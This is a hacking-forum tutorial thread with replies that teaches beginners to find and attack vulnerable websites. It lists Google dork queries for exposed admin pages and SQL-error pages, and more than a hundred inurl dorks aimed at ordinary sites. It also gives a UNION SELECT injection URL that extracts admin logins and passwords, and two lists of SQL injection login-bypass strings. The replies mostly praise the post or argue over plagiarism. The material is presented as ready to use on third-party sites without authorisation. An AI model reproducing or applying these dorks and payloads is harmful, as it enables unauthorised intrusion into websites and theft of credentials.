---===How To Find Vulnerable Websites From Google ? [NoOb fRiendly]===---

[[email protected]]

---===How To Find Vulnerable Websites From Google ? [NoOb fRiendly]===---

For this stuff You will have to just add some simple google query.
Here are some query and its brief Introduction.

Query Type 1 :- intitle:"admin page" inurl:/admin/intext:Edit

Information Of Query :- This query will Directly bypass the admin panel and will redirect to the page of the admin right through where admin edit the website by adding and deleting contents of the website.

Drawback :- This google query is nice but will work for only that sites which's security is very very low.


Query Type 2 :-inurl:/texts/?newsid=

Information Of Query :-This query will show you all the results of the infected url/script,at

there we can make and SQL injection attack weather it is in the POST form or the GET form.I tried here to give you guys a small code of manual

SQL injection for only this particular script.For me,it worked many times.Let's hope it will also work for you guys.enjoy.

Code:

/texts?newsid=-1+union+select+1,2,concat_ws(0x3a,login,password), 4,5,6,7+from+b_adminÔÇö

Target Example :-

Code:

http://www.TargetWebsite.domain/news/texts?newsid=-1+union+select+1,2,concat_ws%280x3a,login,password%29,%204,5,6,7+from+b_admin--

Query Type 3 :- inurl:"id=" & intext:"Warning: mysql_fetch_assoc()


Information Of Query :- This query will show you all the results on the google page which starts from the index.php?id= or index.asp?id=.But the basic benifit is that this query will directly redirect you on the page which will have the MYSQL database or stack overflow error.So this is a nice query to find another SQL vulnerable site,because it gives the direct link of that.In exploit scanner and another software you will find only some links.As you guys know google updates every minutes because every new website's information they have to update in their database.so enjot this query.

Attack Details :- SQL injection :- Tools :- havij 1.7,SQLi Helper 2.7 ,Web crusier,Acunetix Web Vulnerability Scanner 6 Or mannual SQL injection method.

Some Other Queries Related To This Topic :-

Code:

inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:"id=" & intext:"Warning: mysql_free_result()

Information Of Queries :- As Above With the minor changes.But our target is the URL so no need to go into the deep od the description.

Attack Detail :- Same As Above

Query Type 4 :-

Code:

Warning: mysql_result():
inurl:(0x3a,version
inurl:(@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:+union+select+ from
inurl:+union+select+ pass
inurl:+union+select+ SHOP
inurl:+union+select+ admin
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=

Information Of Query :-
-->I think no need for the descpriction.Each query has its own quality.Each query You will give to google it will redirect you the thousands of the pages.and then you have to find the vulnerable url and you can made an attack.

-->You can also use this dorks in the exploit scanner which will directly do a process and give you the vulnerable sites.

Some Almost Working Useful Advance SQL Injection Cheatcodes To By Pass the Admin Panel :-
admin
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

Another SQL injection Cheat codes Works Sometimes :-

Code:

' or '1'='1
'or 'x'='x
'or 0=0--
or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

This is SPARX and thank you all guys for watching my tutorial.
Have a nice day
Enjoy

[mothered]

The good old SQL injection attack, along with the commands.
Good for those unbeknown to this methodology.
Thanks mate.

[[email protected]]

ur welcome...old is gold....but not so much old yar.queries of database's error are new i think....

[Se4nH4x]

Very nice and certainly noob friendly !

[[email protected]]

thnx admin....have a nice day,.

[chroniccommand]

You are not allowed to view links. Register or Login to view.
Way to leach. Just because I hate leachers, I'm going to find you on every site(Since you got on iExploit), and expose you as the leacher you are.

[[email protected]]

lol....i have posted on the docstoc.com...he he he better luck next time..

[chroniccommand]

(09-04-2010 12:29 PM)[email protected] Wrote: You are not allowed to view links. Register or Login to view.lol....i have posted on the docstoc.com...he he he better luck next time..

Good try, but a fail. I contacted the author of the original post on docstoc who said you're leaching. "hehehe better luck next time" to you too.

[MR.CARTER]

good job keep it up ;)

[Guanavo]

Good job sir.
Great thread.